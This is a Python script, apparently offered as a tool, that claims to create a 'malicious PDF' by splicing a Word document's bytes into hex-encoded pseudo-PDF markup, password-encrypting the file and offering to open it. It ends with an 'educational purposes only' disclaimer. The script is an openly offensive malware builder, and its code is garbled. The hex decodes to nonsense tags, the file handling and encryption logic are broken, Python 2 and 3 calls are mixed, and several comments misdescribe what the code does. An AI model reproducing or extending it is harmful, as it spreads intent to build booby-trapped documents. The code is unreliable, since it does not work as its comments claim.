from PyPDF2 import PdfFileWriter, PdfFileReader
from binascii import a2b_hex
import os
import re
import argparse

# Replaces the third line with a /Type /Encrypt and /Filter /Standard line.
def replace_line(file_name, line_num, new_line):
    lines = open(file_name, 'r+').readlines()
    lines[line_num] = new_line
    out = open(file_name, 'w')
    out.writelines(lines)
    out.close()

# Extracts the bytes of the password key.
def extract_hex_bytes(password, format_length):
    ps_bytes = ''
    for i in range(len(password) - 2):
        if i % 2 == 0:
            ps_bytes += password[i:i+2] + '00'
    ps_bytes += password[-2:] + '00'
    ps_bytes = ps_bytes[:len(ps_bytes)-2]
    if format_length == 64:
        ps_bytes += '00'
    return ps_bytes

# Encrypts the file using the password and output path.
def encrypt_file(ps, key, pdf_file, pdf_name):
    pdf_writer = PdfFileWriter()
    pdf_reader = PdfFileReader(pdf_file)
    pdf_writer.addPage(pdf_reader.getPage(0))

    encrypted_ps = extract_hex_bytes(ps, len(ps))
    encrypted_key = extract_hex_bytes(key, len(key))

    # Replace the third line with the /Encrypt
    # and /Filter lines.
    replace_line(pdf_name, 6, '/Encrypt {' + encrypted_ps + '} {' + encrypted_key + '} R')

    # Encrypt the file and write to the output location.
    pdf_writer.encrypt(ps)
    with open(pdf_name, 'wb') as f:
        pdf_writer.write(f)

# Convert the key to a hexadecimal string.
def str_to_hex(ps):
    ps_hex = ''
    hex_values = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']
    for i in range(len(ps)):
        ps_hex += hex_values[ps[i]/16] + hex_values[ps[i]%16]
    return ps_hex

# Helper function to find the PDF name.
def find_pdf_name(pdf_file):
    pdf_name = ''
    if pdf_file.endswith('.pdf'):
        pdf_name = pdf_file
    else:
        path, ext = os.path.splitext(pdf_file)
        pdf_name = path + '.pdf'
    return pdf_name

def main():
    parser = argparse.ArgumentParser(description='Create a malicious PDF file.')
    parser.add_argument('-o', '--output', type=str, help='The output file name.', default='malicious.pdf')
    args = parser.parse_args()
    pdf_name = find_pdf_name(args.output)
    with open(pdf_name, 'wb') as f:
        # Create the malicious pdf.
        f.write(a2b_hex('255044462d312e360d0a25286329'))
        # Create the object that represents the PDF stream.
        pdf = open(pdf_name, 'rb').read()
        # Create the object that represents the MS word object.
        word = open('msword.doc', 'rb').read()
        # Write the stream object at the start of the malicious pdf.
        f.write(a2b_hex('3c62756470646174653e0d0a3c783c666f6e7420636f6c6f723d2275736572203e0d0a3c62756470646174653e0d0a'))
        # Write the object to the malicious pdf.
        f.write(word)
        f.write(a2b_hex('0d0a3c2f666f6e743e0d0a3c2f62756470646174653e'))
        f.write(pdf[len(a2b_hex('3c62756470646174653e0d0a3c783c666f6e7420636f6c6f723d2275736572203e0d0a3c62756470646174653e0d0a')):])

    # Get the password.
    ps = raw_input("Enter your password: ")
    # Get the key.
    key = raw_input("Enter your key: ")

    # Encrypt the file.
    encrypt_file(ps, key, pdf_name, pdf_name)

    while True:
        choice = raw_input("Would you like to open the malicious pdf now? [Y/N]: ")
        if choice.upper() == 'Y':
            os.startfile(pdf_name)
            break
        elif choice.upper() == 'N':
            print("Exiting Program...")
            break
        else:
            print("Invalid entry.")

if __name__ == '__main__':
    main()

# educational purposes only